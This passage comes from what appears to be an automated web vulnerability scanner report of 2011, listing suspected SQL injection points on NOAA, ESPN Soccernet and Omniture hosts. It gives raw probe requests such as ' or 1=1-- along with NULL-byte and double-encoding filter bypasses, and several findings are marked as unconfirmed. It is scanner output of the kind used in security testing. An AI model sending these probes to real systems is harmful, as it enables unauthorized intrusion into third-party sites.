Cookie: PHPSESSID=7bf40be4e7088c5b50a95bc456b809b0

Response 2

HTTP/1.1 302 Found
Date: Sat, 26 Feb 2011 02:41:29 GMT
Server: Apache
X-Powered-By: PHP/5.2.6-1+lenny9
Location: http://response.restoration.noaa.gov/orr_search.php?message=The page you requested was not found. Please use our search page to find what you were looking for.
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 503

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html lang="en">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1
...[SNIP]...

1.95. http://response.restoration.noaa.gov/orr_search.php [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://response.restoration.noaa.gov
Path:   /orr_search.php

Issue detail

The REST URL parameter 1 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 1, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request 1

GET /orr_search.php'?message=The%20page%20you%20requested%20was%20not%20found.%20Please%20use%20our%20search%20page%20to%20find%20what%20you%20were%20looking%20for. HTTP/1.1
Host: response.restoration.noaa.gov
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=7bf40be4e7088c5b50a95bc456b809b0

Response 1

HTTP/1.1 404 Not Found
Date: Sat, 26 Feb 2011 13:47:09 GMT
Server: Apache
X-Powered-By: PHP/5.2.6-1+lenny9
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 1349

<br />
<b>Warning</b>: mysql_fetch_row(): supplied argument is not a valid MySQL result resource in <b>/mnt/disk3/sync/cluster/response.restoration.noaa.gov/publish/http/404.php</b> on line <b>27</b>
...[SNIP]...

Request 2

GET /orr_search.php''?message=The%20page%20you%20requested%20was%20not%20found.%20Please%20use%20our%20search%20page%20to%20find%20what%20you%20were%20looking%20for. HTTP/1.1
Host: response.restoration.noaa.gov
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=7bf40be4e7088c5b50a95bc456b809b0

Response 2

HTTP/1.1 302 Found
Date: Sat, 26 Feb 2011 13:47:10 GMT
Server: Apache
X-Powered-By: PHP/5.2.6-1+lenny9
Location: http://response.restoration.noaa.gov/orr_search.php?message=The page you requested was not found. Please use our search page to find what you were looking for.
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 647

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html lang="en">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1
...[SNIP]...

1.96. http://soccernet.espn.go.com/fixtures [Referer HTTP header]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://soccernet.espn.go.com
Path:   /fixtures

Issue detail

The Referer HTTP header appears to be vulnerable to SQL injection attacks. The payloads 11503772'%20or%201%3d1--%20 and 11503772'%20or%201%3d2--%20 were each submitted in the Referer HTTP header. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /fixtures?league=usa.1\ HTTP/1.1
Host: soccernet.espn.go.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.google.com/search?hl=en&q=11503772'%20or%201%3d1--%20

Response 1

HTTP/1.1 200 OK
Date: Sat, 26 Feb 2011 02:21:01 GMT
Content-Type: text/html; charset=iso-8859-1
Server: Microsoft-IIS/6.0
P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAi IVDi CONi OUR SAMo OTRo BUS PHY ONL UNI PUR COM NAV INT DEM CNT STA PRE"
From: ESPN21
Set-Cookie: SWID=8460282C-16DE-4E41-8F26-DD9C36F5927A; path=/; expires=Sat, 26-Feb-2031 02:21:01 GMT; domain=.go.com;
Cache-Expires: Sat, 26 Feb 2011 02:21:32 GMT
Content-Length: 43631
Cache-Control: no-cache
Pragma: no-cache
Set-Cookie: DE2=dXNhO3R4O2RhbGxhczticm9hZGJhbmQ7NTs0OzM7NjIzOzAzMi43ODc7LTA5Ni43OTk7ODQwOzQ0Ozc3OzY7dXM7; expires=Tue, 08 Mar 2011 02:21:01 GMT; Path=/; Domain=.go.com
Connection: close
Via: 8810-05/06
X-UA-Compatible: IE=EmulateIE7
Vary: Accept-Encoding

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>2010-11 Barclays Premier League Fixtures / Schedules - ESPN Soccernet</title>

   <script>/*c: null*/function cookieFunc(a,j,k){if(j){if(k){var d=new Date();d.setTime(d.getTime()+(k*24*60*60*1000));var b="; expires="+d.toGMTString()}else{var b=""}document.cookie=a+"="+j+b+"; path=/; domain=espn.go.com;"}else{var e=a+"=";var f=document.cookie.split(";");for(var g=0;g<f.length;g++){var h=f[g];while(h.charAt(0)==" "){h=h.substring(1,h.length)}if(h.indexOf(e)==0){return h.substring(e.length,h.length)}}return null}}function setORef(){if(document.referrer){referringUrl=document.referrer.toString();document.cookie=["oRef=",encodeURIComponent(document.referrer),"; expires="+(new Date(+new Date+30000)).toUTCString()].join("")}}(function(){var c=false,e="AcceptCookies";if(document.cookie.indexOf(e)!==-1){c=true}else{cookieFunc(e,"yes",3);cookie=cookieFunc(e,null,null);if(cookie!=null){c=true}}if(c){var g="null",d=cookieFunc("COREG"),f=window.location,a="replace";if(g!=null){g=g+""}if(d!=null&&d!==g){setORef();if(location.toString().indexOf("cc=")!=-1){var b=new RegExp("cc="+g,"i");f=f.toString()[a](b,"cc="+d);window.location[a](f)}else{if(location.toString().indexOf("?")===-1){window.location[a](location+"?cc="+d)}else{window.location[a](f+"&cc="+d)}}}else{if(d==null&&g!="null"&&g!=null&&g!=""){setORef();if(f.toStri
...[SNIP]...

Request 2

GET /fixtures?league=usa.1\ HTTP/1.1
Host: soccernet.espn.go.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.google.com/search?hl=en&q=11503772'%20or%201%3d2--%20

Response 2

HTTP/1.1 200 OK
Cache-Control: max-age=300
Date: Sat, 26 Feb 2011 02:21:01 GMT
Content-Type: text/html; charset=iso-8859-1
Last-Modified: Sat, 26 Feb 2011 02:16:31 GMT
Accept-Ranges: bytes
Server: Microsoft-IIS/6.0
P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAi IVDi CONi OUR SAMo OTRo BUS PHY ONL UNI PUR COM NAV INT DEM CNT STA PRE"
From: ESPN16
Set-Cookie: SWID=75AF709D-3CBF-402A-8A90-73E340EC22E7; path=/; expires=Sat, 26-Feb-2031 02:21:01 GMT; domain=.go.com;
Cache-Expires: Sat, 26 Feb 2011 02:21:32 GMT
Content-Length: 43631
Connection: close
Via: 8810-05/06
X-UA-Compatible: IE=EmulateIE7
Vary: Accept-Encoding

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>2010-11 Barclays Premier League Fixtures / Schedules - ESPN Soccernet</title>

   <script>/*c: null*/function cookieFunc(a,j,k){if(j){if(k){var d=new Date();d.setTime(d.getTime()+(k*24*60*60*1000));var b="; expires="+d.toGMTString()}else{var b=""}document.cookie=a+"="+j+b+"; path=/; domain=espn.go.com;"}else{var e=a+"=";var f=document.cookie.split(";");for(var g=0;g<f.length;g++){var h=f[g];while(h.charAt(0)==" "){h=h.substring(1,h.length)}if(h.indexOf(e)==0){return h.substring(e.length,h.length)}}return null}}function setORef(){if(document.referrer){referringUrl=document.referrer.toString();document.cookie=["oRef=",encodeURIComponent(document.referrer),"; expires="+(new Date(+new Date+30000)).toUTCString()].join("")}}(function(){var c=false,e="AcceptCookies";if(document.cookie.indexOf(e)!==-1){c=true}else{cookieFunc(e,"yes",3);cookie=cookieFunc(e,null,null);if(cookie!=null){c=true}}if(c){var g="null",d=cookieFunc("COREG"),f=window.location,a="replace";if(g!=null){g=g+""}if(d!=null&&d!==g){setORef();if(location.toString().indexOf("cc=")!=-1){var b=new RegExp("cc="+g,"i");f=f.toString()[a](b,"cc="+d);window.location[a](f)}else{if(location.toString().indexOf("?")===-1){window.location[a](location+"?cc="+d)}else{window.location[a](f+"&cc="+d)}}}else{if(d==null&&g!="null"&&g!=null&&g!=""){setORef();if(f.toString().indexOf("?cc")>-1){var b=new RegExp("\\?cc="+g,"i");f=f.toString()[a](b,"");if(f.toString().indexOf("&")>-1){f=f.toString()[a](/&/,"?")}}else{var b=new RegExp("\\&cc="+g,"i");f=f.toString()[a](b,"")}window.l
...[SNIP]...

1.97. http://w88.go.com/b/ss/wdgespchicago,wdgespge/1/H.21/s8627410965971 [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://w88.go.com
Path:   /b/ss/wdgespchicago,wdgespge/1/H.21/s8627410965971

Issue detail

The REST URL parameter 4 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 4, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) before the characters that are being blocked.

Remediation detail

NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request 1

GET /b/ss/wdgespchicago,wdgespge/1%00'/H.21/s8627410965971?AQB=1&ndh=1&t=24/1/2011%2013%3A35%3A26%204%20360&ns=espn&cdp=2&pageName=espnchicago%3Ahome%3Aindex&g=http%3A//espn.go.com/chicago/&r=http%3A//espn.go.com/new-york/&cc=USD&ch=espnchicago%3Ahome&server=espn.go.com&events=event3&c1=espnchicago&h1=espnchicago%3Ahome%3Aindex&c2=D%3DSWID&c4=index&c5=espnchicago%3Ahome&c6=Repeat&v7=%3Aunknown%3Aanonymous%3Aanonymous%3Apremium-no%3A&c9=citynav%2Bchicago&v9=en&c11=anonymous%3Apremium-no&v11=index%3Aespnchicago%3Ahome&c12=espnnewyork%3Anewyork%3Ahome%3Aindex&v13=espnchicago%3Ahome%3Aindex&c17=en&c21=unknown&c22=unknown&c24=Less%20than%201%20day&c29=anonymous&c30=n&s=1920x1200&c=16&j=1.6&v=Y&k=Y&bw=1437&bh=954&p=Chrome%20PDF%20Viewer%3BGoogle%20Gears%200.5.33.0%3BShockwave%20Flash%3BJava%20Deployment%20Toolkit%206.0.230.5%3BJava%28TM%29%20Platform%20SE%206%20U23%3BWPI%20Detector%201.1%3BGoogle%20Update%3BSilverlight%20Plug-In%3BDefault%20Plug-in%3B&pid=espnnewyork%3Anewyork%3Ahome%3Aindex&pidt=1&oid=http%3A//espn.go.com/chicago/&ot=A&AQE=1 HTTP/1.1
Host: w88.go.com
Proxy-Connection: keep-alive
Referer: http://espn.go.com/chicago/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SWID=EEF93A7D-3488-4FA5-8C21-135C0F4819BF; DE2=dXNhO3R4O2RhbGxhczticm9hZGJhbmQ7NTs0OzM7NjIzOzAzMi43ODc7LTA5Ni43OTk7ODQwOzQ0Ozc3OzY7dXM7; CRBLM=CBLM-001:; DS=c29mdGxheWVyLmNvbTswO3NvZnRsYXllciB0ZWNobm9sb2dpZXMgaW5jLjs=; CRBLM_LAST_UPDATE=1298497363; s_vi=[CS]v1|26B2BFB9850139D0-4000010EA079E4CC[CE]; s_sess=%20s_ppv%3D38%3B%20s_sq%3Dwdgespnewyork%252Cwdgespge%253D%252526pid%25253Despnnewyork%2525253Anewyork%2525253Ahome%2525253Aindex%252526pidt%25253D1%252526oid%25253Dhttp%2525253A//espn.go.com/chicago/%252526ot%25253DA%3B%20s_cc%3Dtrue%3B%20s_omni_lid%3D%3B; s_pers=%20s_c24%3D1298576126466%7C1393184126466%3B%20s_c24_s%3DLess%2520than%25201%2520day%7C1298577926466%3B%20s_gpv_pn%3Despnchicago%253Ahome%253Aindex%7C1298577926489%3B

Response 1

HTTP/1.1 404 Not Found
Date: Thu, 24 Feb 2011 19:42:19 GMT
Server: Omniture DC/2.0.0
Content-Length: 417
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /b/ss/wdgespchicago,wdgespge/1 was not found on this
...[SNIP]...
<p>Additionally, a 404 Not Found
error was encountered while trying to use an ErrorDocument to handle the request.</p>
...[SNIP]...

Request 2

GET /b/ss/wdgespchicago,wdgespge/1%00''/H.21/s8627410965971?AQB=1&ndh=1&t=24/1/2011%2013%3A35%3A26%204%20360&ns=espn&cdp=2&pageName=espnchicago%3Ahome%3Aindex&g=http%3A//espn.go.com/chicago/&r=http%3A//espn.go.com/new-york/&cc=USD&ch=espnchicago%3Ahome&server=espn.go.com&events=event3&c1=espnchicago&h1=espnchicago%3Ahome%3Aindex&c2=D%3DSWID&c4=index&c5=espnchicago%3Ahome&c6=Repeat&v7=%3Aunknown%3Aanonymous%3Aanonymous%3Apremium-no%3A&c9=citynav%2Bchicago&v9=en&c11=anonymous%3Apremium-no&v11=index%3Aespnchicago%3Ahome&c12=espnnewyork%3Anewyork%3Ahome%3Aindex&v13=espnchicago%3Ahome%3Aindex&c17=en&c21=unknown&c22=unknown&c24=Less%20than%201%20day&c29=anonymous&c30=n&s=1920x1200&c=16&j=1.6&v=Y&k=Y&bw=1437&bh=954&p=Chrome%20PDF%20Viewer%3BGoogle%20Gears%200.5.33.0%3BShockwave%20Flash%3BJava%20Deployment%20Toolkit%206.0.230.5%3BJava%28TM%29%20Platform%20SE%206%20U23%3BWPI%20Detector%201.1%3BGoogle%20Update%3BSilverlight%20Plug-In%3BDefault%20Plug-in%3B&pid=espnnewyork%3Anewyork%3Ahome%3Aindex&pidt=1&oid=http%3A//espn.go.com/chicago/&ot=A&AQE=1 HTTP/1.1
Host: w88.go.com
Proxy-Connection: keep-alive
Referer: http://espn.go.com/chicago/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SWID=EEF93A7D-3488-4FA5-8C21-135C0F4819BF; DE2=dXNhO3R4O2RhbGxhczticm9hZGJhbmQ7NTs0OzM7NjIzOzAzMi43ODc7LTA5Ni43OTk7ODQwOzQ0Ozc3OzY7dXM7; CRBLM=CBLM-001:; DS=c29mdGxheWVyLmNvbTswO3NvZnRsYXllciB0ZWNobm9sb2dpZXMgaW5jLjs=; CRBLM_LAST_UPDATE=1298497363; s_vi=[CS]v1|26B2BFB9850139D0-4000010EA079E4CC[CE]; s_sess=%20s_ppv%3D38%3B%20s_sq%3Dwdgespnewyork%252Cwdgespge%253D%252526pid%25253Despnnewyork%2525253Anewyork%2525253Ahome%2525253Aindex%252526pidt%25253D1%252526oid%25253Dhttp%2525253A//espn.go.com/chicago/%252526ot%25253DA%3B%20s_cc%3Dtrue%3B%20s_omni_lid%3D%3B; s_pers=%20s_c24%3D1298576126466%7C1393184126466%3B%20s_c24_s%3DLess%2520than%25201%2520day%7C1298577926466%3B%20s_gpv_pn%3Despnchicago%253Ahome%253Aindex%7C1298577926489%3B

Response 2

HTTP/1.1 404 Not Found
Date: Thu, 24 Feb 2011 19:42:19 GMT
Server: Omniture DC/2.0.0
xserver: www618
Content-Length: 0
Content-Type: text/html


1.98. http://w88.go.com/b/ss/wdgespnewyork,wdgespge/1/H.21/s14645075346343 [REST URL parameter 5]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://w88.go.com
Path:   /b/ss/wdgespnewyork,wdgespge/1/H.21/s14645075346343

Issue detail

The REST URL parameter 5 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 5, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) before the characters that are being blocked.

Note that both responses shown below are HTTP 404 from the Omniture DC (data collection) server. The "error message" in Response 1 is the server's generic 404 document, which itself reports that the ErrorDocument handler failed; Response 2 returns the same 404 status with an empty body (Content-Length: 0). Neither response contains database error text, so the differential reflects how the collection endpoint handles an unmatched path rather than a demonstrated SQL query. The Tentative confidence is warranted: treat this as unconfirmed until a SQL-specific error, or a boolean or time-based differential, is obtained.

Remediation detail

NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request 1

GET /b/ss/wdgespnewyork,wdgespge/1/H.21%00'/s14645075346343?AQB=1&ndh=1&t=23/1/2011%2015%3A43%3A23%203%20360&ns=espn&cdp=2&pageName=espnnewyork%3Anewyork%3Ahome%3Aindex&g=http%3A//espn.go.com/new-york/&cc=USD&ch=espnnewyork%3Anewyork&server=espn.go.com&events=event3%2Cevent38&products=ads%3B3358%3A82376%3A683492%3A82314%3B%3B%3Bevent38%3D1%2Cads%3B3359%3A82376%3A743207%3A82314%3B%3B%3Bevent38%3D1&c1=espnnewyork&h1=espnnewyork%3Anewyork%3Ahome%3Aindex&c2=D%3DSWID&c4=index&c5=espnnewyork%3Anewyork%3Ahome&c6=New&v7=%3Aunknown%3Aanonymous%3Aanonymous%3Apremium-no%3A&v9=en&c11=anonymous%3Apremium-no&v11=index%3Aespnnewyork%3Anewyork&v13=espnnewyork%3Anewyork%3Ahome%3Aindex&c17=en&c21=unknown&c22=unknown&c24=First%20Visit&c29=anonymous&c30=n&s=1364x768&c=16&j=1.6&v=Y&k=Y&bw=1226&bh=642&p=Chrome%20PDF%20Viewer%3BGoogle%20Gears%200.5.33.0%3BShockwave%20Flash%3BJava%20Deployment%20Toolkit%206.0.230.5%3BJava%28TM%29%20Platform%20SE%206%20U23%3BWPI%20Detector%201.1%3BGoogle%20Update%3BSilverlight%20Plug-In%3BDefault%20Plug-in%3B&AQE=1 HTTP/1.1
Host: w88.go.com
Proxy-Connection: keep-alive
Referer: http://espn.go.com/new-york/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SWID=EEF93A7D-3488-4FA5-8C21-135C0F4819BF; DE2=dXNhO3R4O2RhbGxhczticm9hZGJhbmQ7NTs0OzM7NjIzOzAzMi43ODc7LTA5Ni43OTk7ODQwOzQ0Ozc3OzY7dXM7; CRBLM=CBLM-001:; DS=c29mdGxheWVyLmNvbTswO3NvZnRsYXllciB0ZWNobm9sb2dpZXMgaW5jLjs=; CRBLM_LAST_UPDATE=1298497363; s_sess=%20s_cc%3Dtrue%3B%20s_omni_lid%3D%3B; s_pers=%20s_c24%3D1298497403866%7C1393105403866%3B%20s_c24_s%3DFirst%2520Visit%7C1298499203866%3B%20s_gpv_pn%3Despnnewyork%253Anewyork%253Ahome%253Aindex%7C1298499203874%3B

Response 1

HTTP/1.1 404 Not Found
Date: Wed, 23 Feb 2011 22:00:31 GMT
Server: Omniture DC/2.0.0
Content-Length: 422
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /b/ss/wdgespnewyork,wdgespge/1/H.21 was not found on
...[SNIP]...
<p>Additionally, a 404 Not Found
error was encountered while trying to use an ErrorDocument to handle the request.</p>
...[SNIP]...

Request 2

GET /b/ss/wdgespnewyork,wdgespge/1/H.21%00''/s14645075346343?AQB=1&ndh=1&t=23/1/2011%2015%3A43%3A23%203%20360&ns=espn&cdp=2&pageName=espnnewyork%3Anewyork%3Ahome%3Aindex&g=http%3A//espn.go.com/new-york/&cc=USD&ch=espnnewyork%3Anewyork&server=espn.go.com&events=event3%2Cevent38&products=ads%3B3358%3A82376%3A683492%3A82314%3B%3B%3Bevent38%3D1%2Cads%3B3359%3A82376%3A743207%3A82314%3B%3B%3Bevent38%3D1&c1=espnnewyork&h1=espnnewyork%3Anewyork%3Ahome%3Aindex&c2=D%3DSWID&c4=index&c5=espnnewyork%3Anewyork%3Ahome&c6=New&v7=%3Aunknown%3Aanonymous%3Aanonymous%3Apremium-no%3A&v9=en&c11=anonymous%3Apremium-no&v11=index%3Aespnnewyork%3Anewyork&v13=espnnewyork%3Anewyork%3Ahome%3Aindex&c17=en&c21=unknown&c22=unknown&c24=First%20Visit&c29=anonymous&c30=n&s=1364x768&c=16&j=1.6&v=Y&k=Y&bw=1226&bh=642&p=Chrome%20PDF%20Viewer%3BGoogle%20Gears%200.5.33.0%3BShockwave%20Flash%3BJava%20Deployment%20Toolkit%206.0.230.5%3BJava%28TM%29%20Platform%20SE%206%20U23%3BWPI%20Detector%201.1%3BGoogle%20Update%3BSilverlight%20Plug-In%3BDefault%20Plug-in%3B&AQE=1 HTTP/1.1
Host: w88.go.com
Proxy-Connection: keep-alive
Referer: http://espn.go.com/new-york/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SWID=EEF93A7D-3488-4FA5-8C21-135C0F4819BF; DE2=dXNhO3R4O2RhbGxhczticm9hZGJhbmQ7NTs0OzM7NjIzOzAzMi43ODc7LTA5Ni43OTk7ODQwOzQ0Ozc3OzY7dXM7; CRBLM=CBLM-001:; DS=c29mdGxheWVyLmNvbTswO3NvZnRsYXllciB0ZWNobm9sb2dpZXMgaW5jLjs=; CRBLM_LAST_UPDATE=1298497363; s_sess=%20s_cc%3Dtrue%3B%20s_omni_lid%3D%3B; s_pers=%20s_c24%3D1298497403866%7C1393105403866%3B%20s_c24_s%3DFirst%2520Visit%7C1298499203866%3B%20s_gpv_pn%3Despnnewyork%253Anewyork%253Ahome%253Aindex%7C1298499203874%3B

Response 2

HTTP/1.1 404 Not Found
Date: Wed, 23 Feb 2011 22:00:31 GMT
Server: Omniture DC/2.0.0
xserver: www596
Content-Length: 0
Content-Type: text/html


1.99. http://w88.go.com/b/ss/wdgespvideo,wdgespge/0/FAS-2.8-AS3/s19650499410927 [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://w88.go.com
Path:   /b/ss/wdgespvideo,wdgespge/0/FAS-2.8-AS3/s19650499410927

Issue detail

The REST URL parameter 1 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 1, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by double URL-encoding the blocked characters - for example, by submitting %2527 instead of the ' character.

Note that the 404 body in Response 1 echoes the request path as /b%27/ss/..., which shows that the server decoded %2527 exactly once (to %27) and then failed to match a resource; Response 2 returns the same 404 status with an empty body. Nothing in either response indicates that a database query ran, so the "error message" here is the generic 404 document rather than a SQL error, and the finding should be treated as unconfirmed.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request 1

GET /b%2527/ss/wdgespvideo,wdgespge/0/FAS-2.8-AS3/s19650499410927 HTTP/1.1
Host: w88.go.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: DE2=dXNhO3R4O2RhbGxhczticm9hZGJhbmQ7NTs0OzM7NjIzOzAzMi43ODc7LTA5Ni43OTk7ODQwOzQ0Ozc3OzY7dXM7; s_pers=%20s_c24%3D1298497403866%7C1393105403866%3B%20s_c24_s%3DFirst%2520Visit%7C1298499203866%3B%20s_gpv_pn%3Despnnewyork%253Anewyork%253Ahome%253Aindex%7C1298499203874%3B; s_sess=%20s_cc%3Dtrue%3B%20s_omni_lid%3D%3B%20s_sq%3D%3B%20s_ppv%3D25%3B; DS=c29mdGxheWVyLmNvbTswO3NvZnRsYXllciB0ZWNobm9sb2dpZXMgaW5jLjs=; s_vi=[CS]v1|26B2BFB9850139D0-4000010EA079E4CC[CE]; CRBLM=CBLM-001:; CRBLM_LAST_UPDATE=1298497363; SWID=EEF93A7D-3488-4FA5-8C21-135C0F4819BF;

Response 1

HTTP/1.1 404 Not Found
Date: Wed, 23 Feb 2011 23:09:27 GMT
Server: Omniture DC/2.0.0
Content-Length: 446
Content-Type: text/html; charset=iso-8859-1
Connection: close

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /b%27/ss/wdgespvideo,wdgespge/0/FAS-2.8-AS3/s19650499
...[SNIP]...
<p>Additionally, a 404 Not Found
error was encountered while trying to use an ErrorDocument to handle the request.</p>
...[SNIP]...

Request 2

GET /b%2527%2527/ss/wdgespvideo,wdgespge/0/FAS-2.8-AS3/s19650499410927 HTTP/1.1
Host: w88.go.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: DE2=dXNhO3R4O2RhbGxhczticm9hZGJhbmQ7NTs0OzM7NjIzOzAzMi43ODc7LTA5Ni43OTk7ODQwOzQ0Ozc3OzY7dXM7; s_pers=%20s_c24%3D1298497403866%7C1393105403866%3B%20s_c24_s%3DFirst%2520Visit%7C1298499203866%3B%20s_gpv_pn%3Despnnewyork%253Anewyork%253Ahome%253Aindex%7C1298499203874%3B; s_sess=%20s_cc%3Dtrue%3B%20s_omni_lid%3D%3B%20s_sq%3D%3B%20s_ppv%3D25%3B; DS=c29mdGxheWVyLmNvbTswO3NvZnRsYXllciB0ZWNobm9sb2dpZXMgaW5jLjs=; s_vi=[CS]v1|26B2BFB9850139D0-4000010EA079E4CC[CE]; CRBLM=CBLM-001:; CRBLM_LAST_UPDATE=1298497363; SWID=EEF93A7D-3488-4FA5-8C21-135C0F4819BF;

Response 2

HTTP/1.1 404 Not Found
Date: Wed, 23 Feb 2011 23:09:26 GMT
Server: Omniture DC/2.0.0
xserver: www184
Content-Length: 0
Content-Type: text/html
Connection: close


1.100. http://w88.go.com/b/ss/wdgespvideo,wdgespge/0/FAS-2.8-AS3/s19650499410927 [REST URL parameter 5]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://w88.go.com
Path:   /b/ss/wdgespvideo,wdgespge/0/FAS-2.8-AS3/s19650499410927

Issue detail

The REST URL parameter 5 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 5, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) before the characters that are being blocked.

Note that, as in 1.98, both responses below are 404s from the Omniture DC server that differ only in whether a 404 body is returned (Content-Length 427 versus 0); neither contains database error text, so the finding remains unconfirmed.

Remediation detail

NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request 1

GET /b/ss/wdgespvideo,wdgespge/0/FAS-2.8-AS3%00'/s19650499410927 HTTP/1.1
